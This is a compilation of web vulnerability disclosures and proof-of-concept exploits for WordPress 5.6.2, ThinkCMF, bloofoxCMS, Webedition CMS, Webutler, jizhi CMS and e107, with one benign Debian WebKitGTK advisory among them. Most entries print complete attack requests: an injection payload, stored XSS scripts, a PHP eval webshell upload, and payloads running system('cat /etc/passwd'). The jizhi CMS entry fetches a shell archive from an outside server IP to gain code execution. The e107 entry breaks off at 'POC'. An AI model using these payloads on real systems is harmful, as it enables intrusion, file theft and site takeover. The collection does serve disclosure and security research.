WordPress Core version 5.6.2 appears to suffer from an xpath injection vulnerability via the log parameter.

    # Exploit Title: WordPress Core 5.6.2 - Xpath Injection# Date: 13/08/2023# Exploit Author: Behrouz Mansoori# Vendor Homepage: https://wordpress.org# Software Link: https://wordpress.org/download/releases# Version: 5.6.2# Tested on: Mac# [ VULNERABILITY DETAILS ] : #This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core,#The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries.#An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.# [ Sample Request ] :POST /wp-login.php HTTP/2Host: localhostCookie: wordpress_test_cookie=WP%20Cookie%20checkContent-Length: 125Cache-Control: max-age=0Sec-Ch-Ua: Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: ""Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9log=test' and extractvalue (rand(), concat (0x7e, version () ))--+&pwd=test&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=https%3A%2F%2Ftarget_site%2Fwp-admin%2F&testcookie=1

WordPress Core 5.6.2 XPath Injection

The InfiniteWP Client plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.11.1 via the 'admin_notice' function. This can allow authenticated attackers with subscriber-level permissions or above to extract sensitive data including configuration. It can only be exploited if the plugin has not been configured yet. If combined with another arbitrary plugin installation and activation vulnerability, it may be possible to connect a site to InfiniteWP which would make remote management possible and allow for elevation of privileges.

CVE-2023-2916: core.class.php in iwp-client/tags/1.11.1 – WordPress Plugin Repository

Cross Site Scripting (XSS) vulnerability in UserController.php in ThinkCMF version 5.1.5, allows attackers to execute arbitrary code via crafted user_login.

At vendor/thinkcmf/cmf-app/src/admin/controller/UserController.php

There is no filtering of the user's post requests.

For example:

line 138:

$result             = DB::name('user')->insertGetId($_POST);

line 221:  
$result = DB::name('user')->update($_POST);

So There is a Stored XSS vulnerability in user management,

POC:

    POST /admin/user/addpost.html HTTP/1.1
    Host: test.net
    Connection: close
    Content-Length: 115
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: https://test.net
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://test.net/admin/user/add.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: thinkphp_show_page_trace=0|0; admin_username=admin; PHPSESSID=ju91k4c4do16sl2qqac553edl1
    
    user_login=%3Cimg+src%3D''+onerror%3Dalert(%2Fxss%2F)%3E&user_pass=123456&user_email=1111%40qqq.com&role_id%5B%5D=2

CVE-2020-25915: There is a store Stored XSS vulnerability in user management · Issue #675 · thinkcmf/thinkcmf

File Upload vulnerability in bloofoxCMS version 0.5.2.1, allows remote attackers to execute arbitrary code and escalate privileges via crafted webshell file to upload module.

I want to report an arbitrary file upload vulnerability that I found in bloofoxcms 0.5.2.1, through which we can upload webshell and control the web server.  
After entering the web management background, we can use the upload function to upload files：  
  
We create a new webshell file and name it script.php ：

    <?php @eval($_GET[1]);
    echo 'upload success';
    ?>
    

Click to select this file(script.php) :  
  
Click upload file(s) and grab the data package:  
  
First request package:

    POST /bloofoxCMS/admin/index.php?mode=tools&page=upload HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------36808327791705981033859481452
    Content-Length: 1187
    Origin: http://127.0.0.1
    Connection: close
    Referer: http://127.0.0.1/bloofoxCMS/admin/index.php?mode=tools&page=upload
    Cookie: sid=o89l00kuhepcn1h7ls87vfsqa1
    Upgrade-Insecure-Requests: 1
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="dir"
    
    ../media/images/
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file1"; filename="script.php"
    Content-Type: application/octet-stream
    
    <?php @eval($_GET[1]);
    echo 'upload success';
    ?>
     
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file2"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file3"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file4"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file5"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="send"
    
    Upload File(s)
    -----------------------------36808327791705981033859481452--
    
    

First response package ：

    HTTP/1.1 302 Found
    Server: nginx/1.15.11
    Date: Fri, 25 Dec 2020 12:43:52 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/7.1.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    LOCATION: index.php?mode=tools&page=upload
    Content-Length: 0
    

Then we follow 302 redirection，  
Second request package ：

    GET /bloofoxCMS/admin/index.php?mode=tools&page=upload HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Origin: http://127.0.0.1
    Connection: close
    Referer: http://127.0.0.1/bloofoxCMS/admin/index.php?mode=tools&page=upload
    Cookie: sid=o89l00kuhepcn1h7ls87vfsqa1
    Upgrade-Insecure-Requests: 1
    

Second response package ：

    HTTP/1.1 200 OK
    Server: nginx/1.15.11
    Date: Fri, 25 Dec 2020 12:44:38 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/7.1.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 6820
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    
    <html>
    <head>
    <title>bloofoxCMS Admincenter</title>
    <meta http-equiv="Content-Type" content="text/html; charset=" />
    <meta name="AUTHOR" content="bloofox, Alexander Lang" />
    <meta name="COPYRIGHT" content="bloofox.com, Alex Lang" />
    <meta name="DATE" content="12/25/2020" />
    <meta name="DESCRIPTION" content="bloofoxCMS Admincenter is the backend for managing the contents of bloofoxCMS" />
    <meta name="TITLE" content="bloofoxCMS Admincenter" />
    <link rel="stylesheet" type="text/css" href="../templates/admincenter/admincenter.css" />
    <link rel="icon" href="../media/images/favicon.ico" type="image/x-icon" />
    <link rel="shortcut icon" href="../media/images/favicon.ico" type="image/x-icon" />
    
    <script type="text/javascript" src="functions.js"></script>
    
    </head>
    
    <body>
    <div id="profile">
    	<a class='edit' href='index.php?page=myprofile' title='Edit Profile'><img src='../templates/admincenter/images/icon-set16/profile_edit.png' alt='Edit Profile' border='0' width='16' height='16' /></a>  <a href='index.php?page=myprofile'>Edit Profile</a><br />
    	<a class='edit' href='index.php?page=changepw' title='Change Password'><img src='../templates/admincenter/images/icon-set16/edit.png' alt='Change Password' border='0' width='16' height='16' /></a>  <a href='index.php?page=changepw'>Change Password</a><br /> 
    	<a class='delete' href='index.php?mode=logout' title='Logout'><img src='../templates/admincenter/images/icon-set16/logout.png' alt='Logout' border='0' width='16' height='16' /></a>  <a href='index.php?mode=logout'>Logout</a><br />
    	
    	<div class="close">
    	<a href="#" onclick="show_hide_layers('profile','','hide');">Close [x]</a>
    	</div>
    </div>
    
    <div id="wrap">
    	<div id="header">
    	<div style="float: left;"><span class="bold">bloofoxCMS Admincenter</span></div>
    	<div style="text-align: right; font-size: 11px; font-weight: bold;">
    	<a href="#" onclick="show_hide_layers('profile','','show');">Username: admin</a> &nbsp;&nbsp; <a class='delete' href='index.php?mode=logout' title='Logout'><img src='../templates/admincenter/images/icon-set16/logout.png' alt='Logout' border='0' width='16' height='16' /></a>  <a href='index.php?mode=logout'>Logout</a></div> 
    	<hr />
    	</div>
    	
    	<div id="sidebar">
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php" title='Home'>Home</a></li> 
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=content" title='Contents'>Contents</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=content&page=levels">Structure</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=pages">Pages</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=articles">Articles</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=media">Media</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=settings" title='Administration'>Administration</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=settings">Settings</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=projects">Projects</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=lang">Languages</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=tmpl">Templates</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=plugins">Plugins</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=charset">Charsets</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=user" title='Security'>Security</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=user">User</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=groups">User Groups</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=permissions">Permissions</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=sessions">Sessions</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='current' href="index.php?mode=tools" title='Tools'>Tools</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=tools">Maintenance</a></li>
    	<li><a class='subcurrent' href="index.php?mode=tools&page=upload">Upload</a></li>
    	
    	
    	<li><a class='subalways' href="index.php?mode=tools&page=phpmyadmin">PhpMyAdmin</a></li>
    	<li><a class='subalways' href="index.php?mode=tools&page=stats">Statistics</a></li>
    </ul>
    </div>
    </div>
    	<div id="space"></div>
    	<div id="main" onclick="show_hide_layers('profile','','hide');">
    		<div id="content">
    		
    		
    <h2>Tools / Upload</h2>
    <div id="content-inlay">
    
    <p class='ok'><img src='../templates/admincenter/images/icon-set16/ok.png' alt='ok.png' border='0' width='16' height='16' /> Files have been uploaded successful.</p>
    
    <form action="index.php?mode=tools&page=upload" method="post" enctype="multipart/form-data">
    <table class="list">
    <tr class='bg_color3'>
    	<td width="150"></td>
    	<td></td>
    </tr>
    <tr class='bg_color2'>
    	<td>Directory</td>
    	<td><select name='dir'><option value='../media/images/'>../media/images/</option><option value='../media/files/'>../media/files/</option><option value='../languages/'>../languages/</option><option value='../templates/admincenter'>../templates/admincenter</option><option value='../templates/default'>../templates/default</option><option value='../media/images/profiles'>../media/images/profiles</option></select></td>
    </tr>
    <tr class='bg_color2'>
    	<td>Template Image</td>
    	<td><input type='checkbox' name='tmplimage' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file1' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file2' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file3' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file4' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file5' size='30' maxlength='250' /></td>
    </tr>
    </table>
    <br />
    <input class='btn' type='submit' name='send' value='Upload File(s)' />
    </form>
    </div>
    
    		
    		</div>
    	</div>
    
    	<div id="footer">
    	<hr />
    	<div style="text-align: right; float: right; font-size: 11px;"><a href='#'>Back to Top</a></div>
    	<div style="text-align: left; font-size: 11px;">
    Powered by <a href="http://www.bloofox.com" target="bloofox">bloofoxCMS</a> &copy; 2012</div>
    	</div>
    </div>
    
    </body>
    </html>
    

We can see that the file has been successfully uploaded to /bloofoxcms/media/images/script.php  

Finally, we can access the webshell address and execute any command：

CVE-2020-36082: An arbitrary file upload vulnerability was found · Issue #7 · alexlang24/bloofoxCMS

Debian Linux Security Advisory 5468-1 - The following vulnerabilities have been discovered in the WebKitGTK web engine. YeongHyeon Choi discovered that processing web content may disclose sensitive information. Narendra Bhati discovered that a website may be able to bypass the Same Origin Policy. Narendra Bhati, Valentino Dalla Valle, Pedro Bernardo, Marco Squarcina, and Lorenzo Veronese discovered that processing web content may lead to arbitrary code execution. Various other issues were also addressed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5468-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
August 05, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-38133 CVE-2023-38572 CVE-2023-38592 CVE-2023-38594  
                 CVE-2023-38595 CVE-2023-38597 CVE-2023-38599 CVE-2023-38600  
                 CVE-2023-38611

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-38133

    YeongHyeon Choi discovered that processing web content may  
    disclose sensitive information.

CVE-2023-38572

    Narendra Bhati discovered that a website may be able to bypass the  
    Same Origin Policy.

CVE-2023-38592

    Narendra Bhati, Valentino Dalla Valle, Pedro Bernardo, Marco  
    Squarcina, and Lorenzo Veronese discovered that processing web  
    content may lead to arbitrary code execution.

CVE-2023-38594

    Yuhao Hu discovered that processing web content may lead to  
    arbitrary code execution.

CVE-2023-38595

    An anonymous researcher, Jiming Wang, and Jikai Ren discovered  
    that processing web content may lead to arbitrary code execution.

CVE-2023-38597

    Junsung Lee discovered that processing web content may lead to  
    arbitrary code execution.

CVE-2023-38599

    Hritvik Taneja, Jason Kim, Jie Jeff Xu, Stephan van Schaik, Daniel  
    Genkin, and Yuval Yarom discovered that a website may be able to  
    track sensitive user information.

CVE-2023-38600

    An anonymous researcher discovered that processing web content may  
    lead to arbitrary code execution.

CVE-2023-38611

    Francisco Alonso discovered that processing web content may lead  
    to arbitrary code execution.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.40.5-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.40.5-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmTOj+AACgkQAAyEYu0C  
2AK4hw/+IqYa65blruup8jZigzY38U60+U+yzSa1MTtV04Nfv5UUMHw/AuSDi/ap  
U5Vcee/oAb8pFeaZFODPY4k6vHUSjc4iL21zG4X0nYvNL7S9KZOS8TlxLVbbDElu  
VLv3La7yB++vzv64DdU/ZuRkbuqowImesSxV8PFMaeJCWzMGX1Ck4jqqOPewmOAl  
EEc9sFQHavZIdsC7kYGYcJi5UDgHUdG7K1JwKmDyQ+cW4CiTHIpGshpBnOyz7Kx9  
AxTMscAqkigJznjY5kzWe5koFzZY7WTGmxmy7fjepEzB/Zdbl2+FRgFl3UHrd6kj  
90blbnyTT6C+/PXkMR8dbeC2y7yTWZoeyyedRu2m700IdZVR19DKCwNj2TaFXD28  
GKLe7fYKusyvPx63JVmHk6p9wokInOyimn+4Ldwv6q2CUAMXOLpia9hEjljrE1nj  
CNbgyJFsgJTbW069GhkABySNKeQbFd4OCZxemb6jcJsXn3pRWoK/32B8tu/srzJo  
OtdcuHC2TEyQS1EzgzJ25WrvcGkgTaz0eoemcXMdvp31xqWpmJEJoQ95Q/lwskq3  
5e0mOH3AabSDVioImrBNtjnDcPP7Sy8Mq70pv+qx6fQZZnnFUD7YLr8D4KcayUSP  
8M6hBjOj1qAJnXb2N2Cw2YRwYhcsFXQ9d7qbC7C03bEFIsSIx0A=VbdY  
-----END PGP SIGNATURE-----

Debian Security Advisory 5468-1

Webedition CMS version 2.9.8.8 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Stored XSSApplication: Webedition CMSVersion: v2.9.8.8   Bugs:  Stored XssTechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1. Login to account2. Go to New ->  Media -> Image3. Upload malicious svg file svg file content:"""<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>"""Poc request:POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1Host: localhostContent-Length: 761Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8eAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300Connection: closewe_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1

Webedition CMS 2.9.8.8 Cross Site Scripting

Webedition CMS version 2.9.8.8 suffers from a remote code execution vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)Application: webedition CmsVersion: v2.9.8.8   Bugs:  RCETechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1. Login account2. Go to New -> Webedition page -> empty page3. Select php4. Set as "><?php echo system("cat /etc/passwd");?>  Description areaPoc request: POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1Host: localhostContent-Length: 1621Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0ddAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300Connection: closewe_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1

Webedition CMS 2.9.8.8 Remote Code Execution

Webutler version 3.2 suffers from a remote shell upload vulnerability.

    Exploit Title: Webutler v3.2 - Remote Code Execution (RCE)Application: webutler CmsVersion: v3.2Bugs:  RCETechnology: PHPVendor URL: https://webutler.de/enSoftware Link: http://webutler.de/download/webutler_v3.2.zipDate of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to visit media 3.upload phar file4. upload poc.phar filepoc.phar file contents :<?php echo system("cat /etc/passwd");?>5. Visit to poc.phar filepoc request:POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1Host: localhostContent-Length: 40sec-ch-ua: sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36X_FILENAME: poc.pharsec-ch-ua-platform: ""Accept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/webutler_v3.2/admin/browser/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropoluConnection: close<?php echo system("cat /etc/passwd");?>

Webutler 3.2 Shell Upload

An arbitrary file download vulnerability in the /c/PluginsController.php component of jizhi CMS 1.9.5 allows attackers to execute arbitrary code via downloading a crafted plugin.

  
Vulnerability lies in http://127.0.0.1/admin.php/Index/index.html  
Extension management at, download location for plugin list  
  
Click on any plugin of the cloud plugin to download  
Burp Suite Packet capture  
  
Can test parameters download\_url  
  
VPS enables HTTP service  
  
Zip compress phpshell.php and upload to VPS  
  
  
  
Successfully caused any file download  
POC:  
POST /admin.php/Plugins/update.html HTTP/1.1  
Host: 127.0.0.1  
Content-Length: 86  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://127.0.0.1  
Referer: http://127.0.0.1/admin.php/Plugins/index.html  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09  
Connection: close

action=start-download&filepath=jzdesign&download\_url=http://119.91.26.244:8090/phpshell.zip

Vulnerability source code analysis:  
Global search for start-download to determine the location of file vulnerabilities  
The vulnerability is located in /A/c/PluginsController.php  
  
  
Line 739 starts with a case statement, followed by an fwrite write operation  
  
Located on line 718, its controllable point is $download\_ url, the path for writing has been provided on line 721, so why can I download any file? The cause of the vulnerability lies in  
  
Starting from line 883, it is the default file download URL, but causing a change after the controllable $download\_url on line 891, resulting in the vulnerability function being curl\_ exec, due to a vulnerability in the curl resource request code, it is possible to arbitrarily request external resources and cause arbitrary file downloads

The function point that can be decompressed is located in the case statement 'file-upzip' on line 776  
  
It will determine whether the file exists. If it exists, it will be saved in A/exts/, and the function will be called get\_zip\_orginalsize to start decompression work  
  
While loop to extract each file  
  
Successfully decompressed  
POC:  
POST /admin.php/Plugins/update.html HTTP/1.1  
Host: 127.0.0.1  
Content-Length: 32  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://127.0.0.1  
Referer: http://127.0.0.1/admin.php/Plugins/index.html  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09  
Connection: close

action=file-upzip&filepath=jzdesign

Access path is http://127.0.0.1/A/exts/phpshell.php  
  
Successfully executing command causing RCE

CVE-2023-38948: jizhi CMS 1.9.5 has a Arbitrary File Download RCE  vulnerability via /A/c/PluginsController.php · Issue #I7LI4E · Pwn师傅/Pwn - Gitee.com

Cross Site Scripting vulnerability in e107 v.2.3.2 allows a remote attacker to execute arbitrary code via the description function in the SEO project.

**e107 v2.3.2 - Reflected XSS**

**Platform:****PHP**

**Date:****2023-05-23**

  

    # Exploit Title: e107 v2.3.2 - Reflected XSS
    # Date: 11/05/2022
    # Exploit Author: Hubert Wojciechowski
    # Contact Author: hub.woj12345@gmail.com
    # Vendor Homepage: https://e107.org/
    # Software Link: https://e107.org/download
    # Version: 2.3.2
    # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
    
    ### XSS Reflected - unauthorized
    
    URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php
    Parameters: content
    
    # POC
